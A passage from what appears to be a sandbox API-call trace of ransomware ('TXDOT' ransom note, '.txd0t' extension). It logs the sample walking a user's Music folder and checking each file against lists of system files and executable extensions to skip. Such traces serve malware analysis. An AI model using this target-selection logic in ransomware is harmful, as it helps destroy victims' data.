psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3" [0075.142] SetEvent (hEvent=0x410) returned 1 [0075.142] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2471fa0, ftCreationTime.dwHighDateTime=0x1d5e392, ftLastAccessTime.dwLowDateTime=0xf62b1850, ftLastAccessTime.dwHighDateTime=0x1d5edc4, ftLastWriteTime.dwLowDateTime=0xf62b1850, ftLastWriteTime.dwHighDateTime=0x1d5edc4, nFileSizeHigh=0x0, nFileSizeLow=0xced5, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="v24aCFd5CzBX.mp3", cAlternateFileName="V24ACF~1.MP3")) returned 1 [0075.142] StrCmpW (psz1="v24aCFd5CzBX.mp3", psz2=".") returned 1 [0075.142] StrCmpW (psz1="v24aCFd5CzBX.mp3", psz2="..") returned 1 [0075.142] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0075.142] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\" [0075.143] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\", psz2="v24aCFd5CzBX.mp3", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3" [0075.143] PathFindExtensionW (pszPath="v24aCFd5CzBX.mp3") returned=".mp3" [0075.143] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0075.143] StrCmpIW (psz1="v24aCFd5CzBX.mp3", psz2="bootsect.bak") returned 1 [0075.143] StrCmpIW (psz1="v24aCFd5CzBX.mp3", psz2="iconcache.db") returned 1 [0075.143] StrCmpIW (psz1="v24aCFd5CzBX.mp3", psz2="thumbs.db") returned 1 [0075.143] StrCmpIW (psz1="v24aCFd5CzBX.mp3", psz2=" ransomware ") returned 1 [0075.143] StrCmpIW (psz1="v24aCFd5CzBX.mp3", psz2=" ransom ") returned 1 [0075.143] StrCmpIW (psz1="v24aCFd5CzBX.mp3", psz2="debug.txt") returned 1 [0075.143] StrCmpIW (psz1="v24aCFd5CzBX.mp3", psz2="boot.ini") returned 1 [0075.143] StrCmpIW (psz1="v24aCFd5CzBX.mp3", psz2="desktop.ini") returned 1 [0075.143] StrCmpIW (psz1="v24aCFd5CzBX.mp3", psz2="autorun.inf") returned 1 [0075.143] StrCmpIW (psz1="v24aCFd5CzBX.mp3", psz2="ntuser.dat") returned 1 [0075.143] StrCmpIW (psz1="v24aCFd5CzBX.mp3", psz2="ntldr") returned 1 [0075.143] StrCmpIW (psz1="v24aCFd5CzBX.mp3", psz2="ntdetect.com") returned 1 [0075.143] StrCmpIW (psz1="v24aCFd5CzBX.mp3", psz2="bootfont.bin") returned 1 [0075.143] StrCmpIW (psz1="v24aCFd5CzBX.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.143] PathFindExtensionW (pszPath="v24aCFd5CzBX.mp3") returned=".mp3" [0075.143] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0075.143] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0075.143] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0075.143] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.159] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.159] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3" [0075.159] SetEvent (hEvent=0x3fc) returned 1 [0075.159] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2471fa0, ftCreationTime.dwHighDateTime=0x1d5e392, ftLastAccessTime.dwLowDateTime=0xf62b1850, ftLastAccessTime.dwHighDateTime=0x1d5edc4, ftLastWriteTime.dwLowDateTime=0xf62b1850, ftLastWriteTime.dwHighDateTime=0x1d5edc4, nFileSizeHigh=0x0, nFileSizeLow=0xced5, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="v24aCFd5CzBX.mp3", cAlternateFileName="V24ACF~1.MP3")) returned 0 [0075.159] FindClose (in: hFindFile=0xec2130 | out: hFindFile=0xec2130) returned 1 [0075.159] GetProcessHeap () returned 0xe30000 [0075.159] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed36d0 | out: hHeap=0xe30000) returned 1 [0075.159] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe99d0, ftCreationTime.dwHighDateTime=0x1d5eb78, ftLastAccessTime.dwLowDateTime=0x15050de0, ftLastAccessTime.dwHighDateTime=0x1d5e45a, ftLastWriteTime.dwLowDateTime=0x15050de0, ftLastWriteTime.dwHighDateTime=0x1d5e45a, nFileSizeHigh=0x0, nFileSizeLow=0x17fc7, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="cSnUOnQz6xEd.wav", cAlternateFileName="CSNUON~1.WAV")) returned 1 [0075.159] StrCmpW (psz1="cSnUOnQz6xEd.wav", psz2=".") returned 1 [0075.159] StrCmpW (psz1="cSnUOnQz6xEd.wav", psz2="..") returned 1 [0075.159] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0075.159] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0075.159] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="cSnUOnQz6xEd.wav", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav" [0075.159] PathFindExtensionW (pszPath="cSnUOnQz6xEd.wav") returned=".wav" [0075.159] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0075.159] StrCmpIW (psz1="cSnUOnQz6xEd.wav", psz2="bootsect.bak") returned 1 [0075.159] StrCmpIW (psz1="cSnUOnQz6xEd.wav", psz2="iconcache.db") returned -1 [0075.159] StrCmpIW (psz1="cSnUOnQz6xEd.wav", psz2="thumbs.db") returned -1 [0075.159] StrCmpIW (psz1="cSnUOnQz6xEd.wav", psz2=" ransomware ") returned 1 [0075.159] StrCmpIW (psz1="cSnUOnQz6xEd.wav", psz2=" ransom ") returned 1 [0075.159] StrCmpIW (psz1="cSnUOnQz6xEd.wav", psz2="debug.txt") returned -1 [0075.160] StrCmpIW (psz1="cSnUOnQz6xEd.wav", psz2="boot.ini") returned 1 [0075.160] StrCmpIW (psz1="cSnUOnQz6xEd.wav", psz2="desktop.ini") returned -1 [0075.160] StrCmpIW (psz1="cSnUOnQz6xEd.wav", psz2="autorun.inf") returned 1 [0075.160] StrCmpIW (psz1="cSnUOnQz6xEd.wav", psz2="ntuser.dat") returned -1 [0075.160] StrCmpIW (psz1="cSnUOnQz6xEd.wav", psz2="ntldr") returned -1 [0075.160] StrCmpIW (psz1="cSnUOnQz6xEd.wav", psz2="ntdetect.com") returned -1 [0075.160] StrCmpIW (psz1="cSnUOnQz6xEd.wav", psz2="bootfont.bin") returned 1 [0075.160] StrCmpIW (psz1="cSnUOnQz6xEd.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.160] PathFindExtensionW (pszPath="cSnUOnQz6xEd.wav") returned=".wav" [0075.160] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0075.160] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0075.160] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0075.160] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.176] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.176] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav" [0075.176] SetEvent (hEvent=0x3fc) returned 1 [0075.176] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b60a1a0, ftCreationTime.dwHighDateTime=0x1d5e472, ftLastAccessTime.dwLowDateTime=0x387b3280, ftLastAccessTime.dwHighDateTime=0x1d5eca3, ftLastWriteTime.dwLowDateTime=0x387b3280, ftLastWriteTime.dwHighDateTime=0x1d5eca3, nFileSizeHigh=0x0, nFileSizeLow=0x18982, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="Ftx5O-lqQUv4Qc8fXk.mp3", cAlternateFileName="FTX5O-~1.MP3")) returned 1 [0075.176] StrCmpW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2=".") returned 1 [0075.176] StrCmpW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2="..") returned 1 [0075.177] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0075.177] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0075.177] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="Ftx5O-lqQUv4Qc8fXk.mp3", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3" [0075.177] PathFindExtensionW (pszPath="Ftx5O-lqQUv4Qc8fXk.mp3") returned=".mp3" [0075.177] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0075.177] StrCmpIW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2="bootsect.bak") returned 1 [0075.177] StrCmpIW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2="iconcache.db") returned -1 [0075.177] StrCmpIW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2="thumbs.db") returned -1 [0075.177] StrCmpIW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2=" ransomware ") returned 1 [0075.177] StrCmpIW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2=" ransom ") returned 1 [0075.177] StrCmpIW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2="debug.txt") returned 1 [0075.177] StrCmpIW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2="boot.ini") returned 1 [0075.177] StrCmpIW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2="desktop.ini") returned 1 [0075.177] StrCmpIW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2="autorun.inf") returned 1 [0075.177] StrCmpIW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2="ntuser.dat") returned -1 [0075.177] StrCmpIW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2="ntldr") returned -1 [0075.177] StrCmpIW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2="ntdetect.com") returned -1 [0075.177] StrCmpIW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2="bootfont.bin") returned 1 [0075.177] StrCmpIW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.177] PathFindExtensionW (pszPath="Ftx5O-lqQUv4Qc8fXk.mp3") returned=".mp3" [0075.177] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0075.177] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0075.177] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0075.177] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0075.200] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.200] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3" [0075.200] SetEvent (hEvent=0x408) returned 1 [0075.200] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafa72b10, ftCreationTime.dwHighDateTime=0x1d5eb5a, ftLastAccessTime.dwLowDateTime=0x495be580, ftLastAccessTime.dwHighDateTime=0x1d5ee3e, ftLastWriteTime.dwLowDateTime=0x495be580, ftLastWriteTime.dwHighDateTime=0x1d5ee3e, nFileSizeHigh=0x0, nFileSizeLow=0x120cd, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="JKFgwNnPDq3IzeypAX.wav", cAlternateFileName="JKFGWN~1.WAV")) returned 1 [0075.200] StrCmpW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2=".") returned 1 [0075.200] StrCmpW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2="..") returned 1 [0075.200] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0075.200] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0075.200] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="JKFgwNnPDq3IzeypAX.wav", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav" [0075.200] PathFindExtensionW (pszPath="JKFgwNnPDq3IzeypAX.wav") returned=".wav" [0075.200] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0075.200] StrCmpIW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2="bootsect.bak") returned 1 [0075.200] StrCmpIW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2="iconcache.db") returned 1 [0075.200] StrCmpIW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2="thumbs.db") returned -1 [0075.200] StrCmpIW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2=" ransomware ") returned 1 [0075.200] StrCmpIW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2=" ransom ") returned 1 [0075.201] StrCmpIW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2="debug.txt") returned 1 [0075.201] StrCmpIW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2="boot.ini") returned 1 [0075.201] StrCmpIW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2="desktop.ini") returned 1 [0075.201] StrCmpIW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2="autorun.inf") returned 1 [0075.201] StrCmpIW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2="ntuser.dat") returned -1 [0075.201] StrCmpIW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2="ntldr") returned -1 [0075.201] StrCmpIW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2="ntdetect.com") returned -1 [0075.201] StrCmpIW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2="bootfont.bin") returned 1 [0075.201] StrCmpIW (psz1="JKFgwNnPDq3IzeypAX.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.201] PathFindExtensionW (pszPath="JKFgwNnPDq3IzeypAX.wav") returned=".wav" [0075.201] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0075.201] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0075.201] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0075.201] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0075.298] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.298] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav" [0075.298] SetEvent (hEvent=0x408) returned 1 [0075.298] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1171f0, ftCreationTime.dwHighDateTime=0x1d5edb4, ftLastAccessTime.dwLowDateTime=0xd60c0a10, ftLastAccessTime.dwHighDateTime=0x1d5f054, ftLastWriteTime.dwLowDateTime=0xd60c0a10, ftLastWriteTime.dwHighDateTime=0x1d5f054, nFileSizeHigh=0x0, nFileSizeLow=0xfff9, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="NXIDve2FMxUql9.wav", cAlternateFileName="NXIDVE~1.WAV")) returned 1 [0075.298] StrCmpW (psz1="NXIDve2FMxUql9.wav", psz2=".") returned 1 [0075.298] StrCmpW (psz1="NXIDve2FMxUql9.wav", psz2="..") returned 1 [0075.298] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0075.298] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0075.299] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="NXIDve2FMxUql9.wav", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav" [0075.299] PathFindExtensionW (pszPath="NXIDve2FMxUql9.wav") returned=".wav" [0075.299] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0075.299] StrCmpIW (psz1="NXIDve2FMxUql9.wav", psz2="bootsect.bak") returned 1 [0075.299] StrCmpIW (psz1="NXIDve2FMxUql9.wav", psz2="iconcache.db") returned 1 [0075.299] StrCmpIW (psz1="NXIDve2FMxUql9.wav", psz2="thumbs.db") returned -1 [0075.299] StrCmpIW (psz1="NXIDve2FMxUql9.wav", psz2=" ransomware ") returned 1 [0075.299] StrCmpIW (psz1="NXIDve2FMxUql9.wav", psz2=" ransom ") returned 1 [0075.299] StrCmpIW (psz1="NXIDve2FMxUql9.wav", psz2="debug.txt") returned 1 [0075.299] StrCmpIW (psz1="NXIDve2FMxUql9.wav", psz2="boot.ini") returned 1 [0075.299] StrCmpIW (psz1="NXIDve2FMxUql9.wav", psz2="desktop.ini") returned 1 [0075.299] StrCmpIW (psz1="NXIDve2FMxUql9.wav", psz2="autorun.inf") returned 1 [0075.299] StrCmpIW (psz1="NXIDve2FMxUql9.wav", psz2="ntuser.dat") returned 1 [0075.299] StrCmpIW (psz1="NXIDve2FMxUql9.wav", psz2="ntldr") returned 1 [0075.299] StrCmpIW (psz1="NXIDve2FMxUql9.wav", psz2="ntdetect.com") returned 1 [0075.299] StrCmpIW (psz1="NXIDve2FMxUql9.wav", psz2="bootfont.bin") returned 1 [0075.299] StrCmpIW (psz1="NXIDve2FMxUql9.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.299] PathFindExtensionW (pszPath="NXIDve2FMxUql9.wav") returned=".wav" [0075.299] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0075.299] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0075.299] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0075.299] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.435] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.435] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav" [0075.435] SetEvent (hEvent=0x3fc) returned 1 [0075.435] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0xb74f0970, ftLastAccessTime.dwHighDateTime=0x1d5ed29, ftLastWriteTime.dwLowDateTime=0xb74f0970, ftLastWriteTime.dwHighDateTime=0x1d5ed29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="toS-EwE0vCCwoskwD1", cAlternateFileName="TOS-EW~1")) returned 1 [0075.435] StrCmpW (psz1="toS-EwE0vCCwoskwD1", psz2=".") returned 1 [0075.435] StrCmpW (psz1="toS-EwE0vCCwoskwD1", psz2="..") returned 1 [0075.435] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0075.435] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0075.435] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="toS-EwE0vCCwoskwD1", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0075.435] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", 